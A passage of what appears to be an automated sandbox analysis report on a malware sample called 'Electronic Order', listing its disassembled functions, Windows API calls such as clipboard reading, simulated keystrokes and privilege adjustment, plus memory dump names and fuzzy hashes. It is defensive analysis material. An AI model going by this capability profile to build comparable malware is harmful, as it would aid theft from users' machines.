                                      • FreeLibrary.KERNEL32(?,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4FDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 41a0e3e159e00813bf6f81bf43ed54e6aa87e54171b353f66aef951275ca1f66
                                      • Instruction ID: f98dda8b68242487887493614247dfff720a5ccc49287cbed4dfb33333148ddd
                                      • Opcode Fuzzy Hash: 41a0e3e159e00813bf6f81bf43ed54e6aa87e54171b353f66aef951275ca1f66
                                      • Instruction Fuzzy Hash: 49F03971105712CFCB349F65E4A4D12BBF1BF043293248A3EE5D683610C731A844DF60
                                      Function 00DE09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE09F4
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LongNamePath_memmove
                                      • String ID:
                                      • API String ID: 2514874351-0
                                      • Opcode ID: 74ab72cf2ec1a13c1e8b31833368c476f305a7454f538f346875c57872802406
                                      • Instruction ID: dd9ebd084718fb662ef4a6e56d5a6d8a088bcbac30d898cb991557a4360d5111
                                      • Opcode Fuzzy Hash: 74ab72cf2ec1a13c1e8b31833368c476f305a7454f538f346875c57872802406
                                      • Instruction Fuzzy Hash: C5E0CD3690522C9BC721D658DC05FFA77EDDF89790F0541B5FD0CD7214D9A19C8186B0
                                      Function 00E29129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction ID: 586c39da62b2c0387e6b18487addebd118fe28c379042e06353e3b03c1099267
                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction Fuzzy Hash: C1E092B0104B405FD7388A24E8507E373E0EB06319F00181CF29A93342EB6278418759
                                      Function 00DC5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00DFE16B,?,?,00000000), ref: 00DC5DBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: a6a0fef9ece3320c4e95a6b9458631d9e0986f92d296a497ab8e54fd533c2909
                                      • Instruction ID: fc807aefe2b91234c38e5ddf3f2112cf3309371845bf9a5015353d348b62805a
                                      • Opcode Fuzzy Hash: a6a0fef9ece3320c4e95a6b9458631d9e0986f92d296a497ab8e54fd533c2909
                                      • Instruction Fuzzy Hash: 7DD0C77464020CBFE710DB81DC46FA9777CD705710F100294FD0466390D6B27D548795
                                      Function 00DE548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction ID: 1b2c04682042eaf6eb34b74b96f949375ec9850667421284890d764d1b135b52
                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction Fuzzy Hash: 17B0927684060C77DE022E82FC02A593B199B406B8F808020FB0C181A2A673A6A096A9
                                      Function 00E2D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00E2D46A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: cc09d2c978768210049404e3b01f351f5649b38f6e5eea1ce2633af4bc68bacc
                                      • Instruction ID: dec377a830005e41ef2bf02323c598c00b678a81bb7042c7c58645bdedf3f4de
                                      • Opcode Fuzzy Hash: cc09d2c978768210049404e3b01f351f5649b38f6e5eea1ce2633af4bc68bacc
                                      • Instruction Fuzzy Hash: E47150302083128FC714EF65E891F6AB7E0EF88314F04556DF5969B2A1DF70E949CB62
                                      Function 00DE0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 4e5adbd2006c076c631ae867d72e4931e154699c38564a13ffe6b3daf7612e00
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: D1311670A00145DFC718EF5AD480969FBB6FF59700B688AA5E449CB651D7B0EDC1CBE0
                                      Function 0158229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 015822B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 9c22fc1a09af6936f7e0f7ac5acda46efe83842e9eb4f7e84cb963f39e9a0885
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: 12E09A7494010EAFDB00EFA4D54969E7BB4EF04311F1005A1FD05A6681DA309A548A62
                                      Function 015822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 015822B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 929309ab14552ea07737995a51c48bc1ddfd74d1e012c43cb6bb000bd85dbfed
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: DEE0BF7494010E9FDB00EFA4D54969E7FB4EF04301F100161FD05A2281D63099508A62

                                      Non-executed Functions

                                      Function 00E4CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E4CE50
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4CE91
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E4CED6
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4CF00
                                      • SendMessageW.USER32 ref: 00E4CF29
                                      • _wcsncpy.LIBCMT ref: 00E4CFA1
                                      • GetKeyState.USER32(00000011), ref: 00E4CFC2
                                      • GetKeyState.USER32(00000009), ref: 00E4CFCF
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4CFE5
                                      • GetKeyState.USER32(00000010), ref: 00E4CFEF
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4D018
                                      • SendMessageW.USER32 ref: 00E4D03F
                                      • SendMessageW.USER32(?,00001030,?,00E4B602), ref: 00E4D145
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E4D15B
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E4D16E
                                      • SetCapture.USER32(?), ref: 00E4D177
                                      • ClientToScreen.USER32(?,?), ref: 00E4D1DC
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E4D1E9
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E4D203
                                      • ReleaseCapture.USER32 ref: 00E4D20E
                                      • GetCursorPos.USER32(?), ref: 00E4D248
                                      • ScreenToClient.USER32(?,?), ref: 00E4D255
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4D2B1
                                      • SendMessageW.USER32 ref: 00E4D2DF
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4D31C
                                      • SendMessageW.USER32 ref: 00E4D34B
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E4D36C
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E4D37B
                                      • GetCursorPos.USER32(?), ref: 00E4D39B
                                      • ScreenToClient.USER32(?,?), ref: 00E4D3A8
                                      • GetParent.USER32(?), ref: 00E4D3C8
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4D431
                                      • SendMessageW.USER32 ref: 00E4D462
                                      • ClientToScreen.USER32(?,?), ref: 00E4D4C0
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E4D4F0
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4D51A
                                      • SendMessageW.USER32 ref: 00E4D53D
                                      • ClientToScreen.USER32(?,?), ref: 00E4D58F
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E4D5C3
                                        • Part of subcall function 00DC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DC25EC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4D65F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F$pr
                                      • API String ID: 3977979337-1436871235
                                      • Opcode ID: 97945179a7a051d9bb96cdfbb38a78b00313f6e0932770a7e51a434385c0bb98
                                      • Instruction ID: a1b1ae5ddc2275e83ea6110b8ed23fe77b408f9cd0de697da789e67117d102a6
                                      • Opcode Fuzzy Hash: 97945179a7a051d9bb96cdfbb38a78b00313f6e0932770a7e51a434385c0bb98
                                      • Instruction Fuzzy Hash: 2342FD34609341AFC725CF29E844FAABBE5FF49718F24051DF699A72A0C731D845CBA2
                                      Function 00E4804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E4873F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: a5a0d6568f71815e4349b1eac5d3a96696cd5c97512b8475bcea1b45d978b1da
                                      • Instruction ID: 5adf82282d8b3954da609c70835b12a89e77b83094f28edc60952e443743d492
                                      • Opcode Fuzzy Hash: a5a0d6568f71815e4349b1eac5d3a96696cd5c97512b8475bcea1b45d978b1da
                                      • Instruction Fuzzy Hash: 68120270500204AFEB259F25ED49FAE7BB8EF49B14F20516AF915FA2E1DF708941CB60
                                      Function 00DD710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$_memset
                                      • String ID: 0w$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                      • API String ID: 1357608183-3460961967
                                      • Opcode ID: ea0269753b9baa3eeff57dec6aaddfed6584659252ab7dd7c0c62d02d6c5bc93
                                      • Instruction ID: 290e9796d0142d6e5a4516d2bce2c7739880484adf718c5827cd9904f2933ad4
                                      • Opcode Fuzzy Hash: ea0269753b9baa3eeff57dec6aaddfed6584659252ab7dd7c0c62d02d6c5bc93
                                      • Instruction Fuzzy Hash: 9D938E71A002199BDB24CFA8D881BEDB7B1FF48714F25916AE955BB380E7709EC1CB50
                                      Function 00DC4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?), ref: 00DC4A3D
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DFDA8E
                                      • IsIconic.USER32(?), ref: 00DFDA97
                                      • ShowWindow.USER32(?,00000009), ref: 00DFDAA4
                                      • SetForegroundWindow.USER32(?), ref: 00DFDAAE
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DFDAC4
                                      • GetCurrentThreadId.KERNEL32 ref: 00DFDACB
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DFDAD7
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DFDAE8
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DFDAF0
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00DFDAF8
                                      • SetForegroundWindow.USER32(?), ref: 00DFDAFB
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB10
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB1B
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB25
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB2A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB33
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB38
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB42
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB47
                                      • SetForegroundWindow.USER32(?), ref: 00DFDB4A
                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00DFDB71
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: ccca4398a9d9f8e856582aeb1522fb9e3c53ebcd54809693a9e2b066606677af
                                      • Instruction ID: bc02e1ab9ed3616fab7b0471ada40cc3bdc27f7b54ef3f952f0752bde2e98744
                                      • Opcode Fuzzy Hash: ccca4398a9d9f8e856582aeb1522fb9e3c53ebcd54809693a9e2b066606677af
                                      • Instruction Fuzzy Hash: 31316275A4031CBEEB216F629C49F7F3E6DEB45F50F168065FA04FA1D0C6B09D01AAA0
                                      Function 00E18858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E18CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E18D0D
                                        • Part of subcall function 00E18CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E18D3A
                                        • Part of subcall function 00E18CC3: GetLastError.KERNEL32 ref: 00E18D47
                                      • _memset.LIBCMT ref: 00E1889B
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E188ED
                                      • CloseHandle.KERNEL32(?), ref: 00E188FE
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E18915
                                      • GetProcessWindowStation.USER32 ref: 00E1892E
                                      • SetProcessWindowStation.USER32(00000000), ref: 00E18938
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E18952
                                        • Part of subcall function 00E18713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E18851), ref: 00E18728
                                        • Part of subcall function 00E18713: CloseHandle.KERNEL32(?,?,00E18851), ref: 00E1873A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: 23ca0e957c416c9b1f0ee41117ddc82b24d2ba5cb87ef9e25d33954ab734a003
                                      • Instruction ID: 7ed37b9439a9fde8481acaae40666174bca1e8c39f7b80832d9a8be2cc6606e1
                                      • Opcode Fuzzy Hash: 23ca0e957c416c9b1f0ee41117ddc82b24d2ba5cb87ef9e25d33954ab734a003
                                      • Instruction Fuzzy Hash: 3F817975900209AFDF11DFA1DE45AEEBBB8FF05709F08516AF820B2161DB318E95DB60
                                      Function 00E3425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(00E4F910), ref: 00E34284
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E34292
                                      • GetClipboardData.USER32(0000000D), ref: 00E3429A
                                      • CloseClipboard.USER32 ref: 00E342A6
                                      • GlobalLock.KERNEL32(00000000), ref: 00E342C2
                                      • CloseClipboard.USER32 ref: 00E342CC
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E342E1
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00E342EE
                                      • GetClipboardData.USER32(00000001), ref: 00E342F6
                                      • GlobalLock.KERNEL32(00000000), ref: 00E34303
                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E34337
                                      • CloseClipboard.USER32 ref: 00E34447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: aec910df08d69e30429ebb8a92907e732319ac1503b388da41c7da8a3fd11fc8
                                      • Instruction ID: ee6fe760edb2c845940dce2c713d596f6961a4f7bd15c57c78b7a3be2d4124d1
                                      • Opcode Fuzzy Hash: aec910df08d69e30429ebb8a92907e732319ac1503b388da41c7da8a3fd11fc8
                                      • Instruction Fuzzy Hash: 2C517E75204206AFD311AB61EC99F6F7BA8AF85B00F014529F556F31F1DF70A909CB62
                                      Function 00E2C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E2C9F8
                                      • FindClose.KERNEL32(00000000), ref: 00E2CA4C
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2CA71
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2CA88
